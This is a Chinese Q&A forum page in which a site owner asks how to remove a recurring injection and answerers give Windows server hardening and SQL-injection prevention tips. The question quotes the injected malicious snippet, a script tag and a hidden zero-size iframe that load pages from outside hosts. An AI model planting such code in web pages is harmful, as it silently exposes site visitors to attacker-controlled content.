网站被加入恶意代码,清了不久又有,如何彻底解决?

来源:百度知道 编辑:UC知道 时间:2024/06/03 07:23:19
网站的每个文件都被加入下面这段代码:

<script language="JavaScript" charset="gb2312" type="text/javascript" src="http://www8.itsun.com/count.php?uuid=1746114&style=none"></script><iframe src="http://vip.ppwow.com/money.htm?id=74" width="0" height="0" frameborder="0"></iframe>

请问有什么方法可以找出木马?

应该是中了广告软件。
建议先使用360safe查杀看看!
下载地址:
http://www.360safe.com

360安全卫士+WINDOWS清理助手,能解决95%以上的木马病毒和流氓软件!

找木马只要服务器上装个杀毒软件,升级到最新版,到安全模式杀毒就可以了。

如果你的服务器是虚拟空间,要治本只能找虚拟空间的管理员。如果是自己管理的服务器,可以参照下面的办法——

肯定是你的网站有漏洞被攻破了。至于怎么被攻击的,方法有很多,一时也说不完,而且不知道你系统的情况,很难说出一个具体可能性。还是说说怎么补救吧(以下说的是Windows服务器的):
1、赶紧改系统管理员administrator的密码,另建一个管理员账号。密码都尽量设得复杂一点。
2、删除除了上述两个管理员账号及Web服务器用的IUSR_?和IWAM_?外的其它账号
3、服务器上安装杀毒软件,升级到最新版本,全面杀毒杀马。注意停止服务器上所有无关的服务和驱动。其中有一些没有公司签名的,可能就是病毒的。关于怎么彻底清理病毒和木马,这里就不详细说明了。
4、用Windows Update补齐所有系统补丁。
5、如果是XP或2003系统,启用自带的防火墙,将除了80端口和你远程登陆端口外的所有端口,禁止ICMP访问。

6、如果你的网站有动态网页,数据库用的是MS SQL, 需要特别注意防止SQL Injection,要点如下(更详细的请自行查资料):
a 将MS SQL Server的xp_cmdshell扩展存储删掉
b 减小你动态网页中连接数据库的那个账号在数据库系统中的访问权限
c 仔细检查你的每个动态网页,确保每个输入(包括URL中的参数)都进行了检查,过滤掉了“'-;”等非法字符
如果是access数据库,要防止access库文件被人下载更换再传上来。

7、修改你数据库中各主要账号的密码